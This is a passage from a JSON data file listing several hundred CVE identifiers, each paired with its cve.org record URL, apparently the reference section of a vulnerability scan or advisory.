"url": "https://www.cve.org/CVERecord?id=CVE-2022-2521"
},
{
"name": "CVE-2023-49582",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-49582"
},
{
"name": "CVE-2025-43857",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43857"
},
{
"name": "CVE-2025-31344",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31344"
},
{
"name": "CVE-2025-21976",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21976"
},
{
"name": "CVE-2023-28321",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28321"
},
{
"name": "CVE-2024-57975",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57975"
},
{
"name": "CVE-2020-14581",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14581"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2021-32491",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32491"
},
{
"name": "CVE-2025-50077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50077"
},
{
"name": "CVE-2022-2309",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2309"
},
{
"name": "CVE-2024-52533",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52533"
},
{
"name": "CVE-2023-24536",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24536"
},
{
"name": "CVE-2023-22025",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22025"
},
{
"name": "CVE-2021-43527",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43527"
},
{
"name": "CVE-2022-0924",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0924"
},
{
"name": "CVE-2025-24014",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24014"
},
{
"name": "CVE-2022-33068",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-33068"
},
{
"name": "CVE-2025-38342",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38342"
},
{
"name": "CVE-2025-54988",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54988"
},
{
"name": "CVE-2024-58068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58068"
},
{
"name": "CVE-2025-23083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23083"
},
{
"name": "CVE-2015-4777",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4777"
},
{
"name": "CVE-2025-7039",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7039"
},
{
"name": "CVE-2025-38167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38167"
},
{
"name": "CVE-2022-42915",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42915"
},
{
"name": "CVE-2023-0687",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0687"
},
{
"name": "CVE-2024-57998",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57998"
},
{
"name": "CVE-2021-3426",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3426"
},
{
"name": "CVE-2022-32221",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32221"
},
{
"name": "CVE-2022-1304",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1304"
},
{
"name": "CVE-2021-2388",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2388"
},
{
"name": "CVE-2022-37434",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-37434"
},
{
"name": "CVE-2025-38257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38257"
},
{
"name": "CVE-2022-29458",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29458"
},
{
"name": "CVE-2025-38206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38206"
},
{
"name": "CVE-2019-12900",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12900"
},
{
"name": "CVE-2023-5156",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5156"
},
{
"name": "CVE-2024-39908",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39908"
},
{
"name": "CVE-2025-27220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27220"
},
{
"name": "CVE-2021-32256",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32256"
},
{
"name": "CVE-2022-22942",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22942"
},
{
"name": "CVE-2024-38950",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38950"
},
{
"name": "CVE-2025-55163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55163"
},
{
"name": "CVE-2025-21862",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21862"
},
{
"name": "CVE-2023-47282",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-47282"
},
{
"name": "CVE-2016-20012",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-20012"
},
{
"name": "CVE-2025-38111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38111"
},
{
"name": "CVE-2024-0553",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0553"
},
{
"name": "CVE-2022-44638",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-44638"
},
{
"name": "CVE-2019-8325",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8325"
},
{
"name": "CVE-2025-21950",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21950"
},
{
"name": "CVE-2025-5918",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5918"
},
{
"name": "CVE-2019-3792",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-3792"
},
{
"name": "CVE-2022-43235",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43235"
},
{
"name": "CVE-2025-50092",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50092"
},
{
"name": "CVE-2025-50099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50099"
},
{
"name": "CVE-2017-3614",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3614"
},
{
"name": "CVE-2022-0562",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0562"
},
{
"name": "CVE-2022-28131",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28131"
},
{
"name": "CVE-2025-22001",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22001"
},
{
"name": "CVE-2024-10524",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10524"
},
{
"name": "CVE-2025-40017",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40017"
},
{
"name": "CVE-2023-45919",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45919"
},
{
"name": "CVE-2025-38326",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38326"
},
{
"name": "CVE-2025-3263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3263"
},
{
"name": "CVE-2025-4878",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4878"
},
{
"name": "CVE-2018-15607",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-15607"
},
{
"name": "CVE-2025-21899",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21899"
},
{
"name": "CVE-2025-32990",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32990"
},
{
"name": "CVE-2025-38384",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38384"
},
{
"name": "CVE-2025-40778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40778"
},
{
"name": "CVE-2025-21719",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21719"
},
{
"name": "CVE-2025-38424",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38424"
},
{
"name": "CVE-2025-38430",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38430"
},
{
"name": "CVE-2025-21718",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21718"
},
{
"name": "CVE-2025-3001",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3001"
},
{
"name": "CVE-2025-9288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
},
{
"name": "CVE-2021-35588",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35588"
},
{
"name": "CVE-2022-32545",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32545"
},
{
"name": "CVE-2025-21694",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21694"
},
{
"name": "CVE-2025-41244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41244"
},
{
"name": "CVE-2022-24675",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24675"
},
{
"name": "CVE-2023-2603",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2603"
},
{
"name": "CVE-2025-21820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21820"
},
{
"name": "CVE-2017-6838",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6838"
},
{
"name": "CVE-2024-41946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41946"
},
{
"name": "CVE-2025-4802",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4802"
},
{
"name": "CVE-2024-21140",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21140"
},
{
"name": "CVE-2024-41817",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41817"
},
{
"name": "CVE-2024-57979",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57979"
},
{
"name": "CVE-2024-58071",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58071"
},
{
"name": "CVE-2025-21994",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21994"
},
{
"name": "CVE-2025-30684",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30684"
},
{
"name": "CVE-2017-6835",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6835"
},
{
"name": "CVE-2024-21094",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21094"
},
{
"name": "CVE-2025-48989",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48989"
},
{
"name": "CVE-2024-9143",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9143"
},
{
"name": "CVE-2023-0799",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0799"
},
{
"name": "CVE-2024-12087",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12087"
},
{
"name": "CVE-2025-38420",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38420"
},
{
"name": "CVE-2021-3521",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3521"
},
{
"name": "CVE-2022-23806",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23806"
},
{
"name": "CVE-2022-21365",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21365"
},
{
"name": "CVE-2025-21943",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21943"
},
{
"name": "CVE-2019-16775",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16775"
},
{
"name": "CVE-2024-57997",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57997"
},
{
"name": "CVE-2025-38160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38160"
},
{
"name": "CVE-2024-33601",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33601"
},
{
"name": "CVE-2025-32989",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32989"
},
{
"name": "CVE-2025-6051",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6051"
},
{
"name": "CVE-2022-21283",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21283"
},
{
"name": "CVE-2022-31782",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-31782"
},
{
"name": "CVE-2025-50093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50093"
},
{
"name": "CVE-2025-38107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38107"
},
{
"name": "CVE-2025-32434",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32434"
},
{
"name": "CVE-2025-22874",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22874"
},
{
"name": "CVE-2025-53069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53069"
},
{
"name": "CVE-2025-38085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38085"
},
{
"name": "CVE-2025-21806",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21806"
},
{
"name": "CVE-2025-38222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38222"
},
{
"name": "CVE-2025-38197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38197"
},
{
"name": "CVE-2022-1271",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1271"
},
{
"name": "CVE-2024-28085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28085"
},
{
"name": "CVE-2022-43253",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43253"
},
{
"name": "CVE-2021-36221",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36221"
},
{
"name": "CVE-2024-57977",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57977"
},
{
"name": "CVE-2018-1000075",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000075"
},
{
"name": "CVE-2025-53019",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53019"
},
{
"name": "CVE-2020-14782",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14782"
},
{
"name": "CVE-2025-50059",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50059"
},
{
"name": "CVE-2024-5569",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5569"
},
{
"name": "CVE-2024-57952",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57952"
},
{
"name": "CVE-2025-53367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53367"
},
{
"name": "CVE-2025-21579",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21579"
},
{
"name": "CVE-2021-45942",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45942"
},
{
"name": "CVE-2022-1615",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1615"
},
{
"name": "CVE-2025-21928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21928"
},
{
"name": "CVE-2021-20246",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20246"
},
{
"name": "CVE-2025-21707",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21707"
},
{
"name": "CVE-2023-24755",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24755"
},
{
"name": "CVE-2024-34156",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34156"
},
{
"name": "CVE-2022-2880",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2880"
},
{
"name": "CVE-2025-5025",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5025"
},
{
"name": "CVE-2023-21937",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21937"
},
{
"name": "CVE-2022-23773",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23773"
},
{
"name": "CVE-2025-22007",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22007"
},
{
"name": "CVE-2023-24539",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24539"
},
{
"name": "CVE-2024-27281",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27281"
},
{
"name": "CVE-2025-38467",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38467"
},
{
"name": "CVE-2024-34459",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34459"
},
{
"name": "CVE-2025-21804",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21804"
},
{
"name": "CVE-2021-34558",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-34558"
},
{
"name": "CVE-2021-3737",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3737"
},
{
"name": "CVE-2025-49795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49795"
},
{
"name": "CVE-2017-6837",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6837"
},
{
"name": "CVE-2014-9913",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-9913"
},
{
"name": "CVE-2025-21934",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21934"
},
{
"name": "CVE-2025-38072",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38072"
},
{
"name": "CVE-2025-53044",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53044"
},
{
"name": "CVE-2023-6237",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6237"
},
{
"name": "CVE-2024-37407",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37407"
},
{
"name": "CVE-2015-4775",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4775"
},
{
"name": "CVE-2025-22011",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22011"
},
{
"name": "CVE-2022-1725",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1725"
},
{
"name": "CVE-2022-43252",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43252"
},
{
"name": "CVE-2023-0614",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0614"
},
{
"name": "CVE-2016-0694",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0694"
},
{
"name": "CVE-2023-6228",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6228"
},
{
"name": "CVE-2021-46848",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46848"
},
{
"name": "CVE-2024-5197",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5197"
},
{
"name": "CVE-2020-21606",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-21606"
},
{
"name": "CVE-2025-38075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38075"
},
{
"name": "CVE-2025-38000",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38000"
},
{
"name": "CVE-2022-40674",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40674"
},
{
"name": "CVE-2025-1376",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1376"
},
{
"name": "CVE-2025-30761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30761"
},
{
"name": "CVE-2001-1269",
"url": "https://www.cve.org/CVERecord?id=CVE-2001-1269"
},
{
"name": "CVE-2025-50087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50087"
},
{
"name": "CVE-2024-22365",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22365"
},
{
"name": "CVE-2025-38058",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38058"
},
{
"name": "CVE-2023-20873",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-20873"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2022-4450",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4450"
},
{
"name": "CVE-2025-38617",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38617"
},
{
"name": "CVE-2025-21762",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21762"
},
{
"name": "CVE-2023-47169",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-47169"
},
{
"name": "CVE-2025-38122",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38122"
},
{
"name": "CVE-2025-21801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21801"
},
{
"name": "CVE-2024-7592",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7592"
},
{
"name": "CVE-2025-48988",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48988"
},
{
"name": "CVE-2025-38083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38083"
},
{
"name": "CVE-2023-2650",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2650"
},
{
"name": "CVE-2023-0795",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0795"
},
{
"name": "CVE-2015-2583",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2583"
},
{
"name": "CVE-2025-21692",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21692"
},
{
"name": "CVE-2025-38173",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38173"
},
{
"name": "CVE-2022-21434",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21434"
},
{
"name": "CVE-2025-2148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2148"
},
{
"name": "CVE-2024-2236",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2236"
},
{
"name": "CVE-2025-38143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38143"
},
{
"name": "CVE-2023-4039",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4039"
},
{
"name": "CVE-2025-45768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-45768"
},
{
"name": "CVE-2023-38469",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38469"
},
{
"name": "CVE-2024-38428",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38428"
},
{
"name": "CVE-2022-3821",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3821"
},
{
"name": "CVE-2014-3577",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-3577"
},
{
"name": "CVE-2025-21869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21869"
},
{
"name": "CVE-2025-1365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1365"
},
{
"name": "CVE-2023-32570",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32570"
},
{
"name": "CVE-2025-54410",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54410"
},
{
"name": "CVE-2023-52970",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52970"
},
{
"name": "CVE-2022-3996",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3996"
},
{
"name": "CVE-2024-25062",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25062"
},
{
"name": "CVE-2016-5841",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-5841"
},
{
"name": "CVE-2022-2879",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2879"
},
{
"name": "CVE-2025-53101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53101"
},
{
"name": "CVE-2022-32205",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32205"
},
{
"name": "CVE-2023-27534",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27534"
},
{
"name": "CVE-2024-2398",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2398"
},
{
"name": "CVE-2023-24532",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24532"
},
{
"name": "CVE-2023-27536",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27536"
},
{
"name": "CVE-2025-52434",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52434"
},
{
"name": "CVE-2024-54458",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54458"
},
{
"name": "CVE-2022-44267",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-44267"
},
{
"name": "CVE-2024-26141",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26141"
},
{
"name": "CVE-2015-4783",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4783"
},
{
"name": "CVE-2019-8321",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8321"
},
{
"name": "CVE-2025-21826",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21826"
},
{
"name": "CVE-2025-29768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29768"
},
{
"name": "CVE-2015-4774",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4774"
},
{
"name": "CVE-2023-50495",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50495"
},
{
"name": "CVE-2022-23772",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23772"
},
{
"name": "CVE-2022-21294",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21294"
},
{
"name": "CVE-2025-21750",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21750"
},
{
"name": "CVE-2017-11164",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-11164"
},
{
"name": "CVE-2024-57924",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57924"
},
{
"name": "CVE-2025-21912",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21912"
},
{
"name": "CVE-2018-13440",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-13440"
},
{
"name": "CVE-2022-42898",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42898"
},
{
"name": "CVE-2025-46393",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46393"
},
{
"name": "CVE-2022-43551",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43551"
},
{
"name": "CVE-2021-0561",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0561"
},
{
"name": "CVE-2018-12599",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12599"
},
{
"name": "CVE-2025-21859",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21859"
},
{
"name": "CVE-2025-38416",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38416"
},
{
"name": "CVE-2022-1587",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1587"
},
{
"name": "CVE-2025-21825",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21825"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2017-7246",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7246"
},
{
"name": "CVE-2020-2755",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2755"
},
{
"name": "CVE-2025-8714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8714"
},
{
"name": "CVE-2023-27533",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27533"
},
{
"name": "CVE-2022-0284",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0284"
},
{
"name": "CVE-2017-7500",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7500"
},
{
"name": "CVE-2025-9086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9086"
},
{
"name": "CVE-2025-49124",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49124"
},
{
"name": "CVE-2023-6481",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6481"
},
{
"name": "CVE-2024-58016",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58016"
},
{
"name": "CVE-2020-14779",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14779"
},
{
"name": "CVE-2025-21903",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21903"
},
{
"name": "CVE-2021-41772",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41772"
},
{
"name": "CVE-2021-32292",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32292"
},
{
"name": "CVE-2025-38194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38194"
},
{
"name": "CVE-2024-0727",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0727"
},
{
"name": "CVE-2023-6378",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6378"
},
{
"name": "CVE-2024-10041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10041"
},
{
"name": "CVE-2023-6129",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6129"
},
{
"name": "CVE-2022-34903",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-34903"
},
{
"name": "CVE-2023-1667",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1667"
},
{
"name": "CVE-2022-2953",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2953"
},
{
"name": "CVE-2022-43238",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43238"
},
{
"name": "CVE-2025-3121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3121"
},
{
"name": "CVE-2022-4899",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4899"
},
{
"name": "CVE-2022-43680",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43680"
},
{
"name": "CVE-2025-21956",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21956"
},
{
"name": "CVE-2024-20696",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20696"
},
{
"name": "CVE-2025-21761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21761"
},
{
"name": "CVE-2025-46149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46149"
},
{
"name": "CVE-2021-26945",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26945"
},
{
"name": "CVE-2025-37932",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37932"
},
{
"name": "CVE-2022-3219",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3219"
},
{
"name": "CVE-2025-46152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46152"
},
{
"name": "CVE-2025-37890",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37890"
},
{
"name": "CVE-2024-57951",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57951"
},
{
"name": "CVE-2025-4673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4673"
},
{
"name": "CVE-2022-34169",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-34169"
},
{
"name": "CVE-2025-38348",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38348"
},
{
"name": "CVE-2023-34969",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34969"
},
{
"name": "CVE-2025-21844",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21844"
},
{
"name": "CVE-2025-21885",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21885"
},
{
"name": "CVE-2020-22916",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-22916"
},
{
"name": "CVE-2025-21784",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21784"
},
{
"name": "CVE-2025-31672",
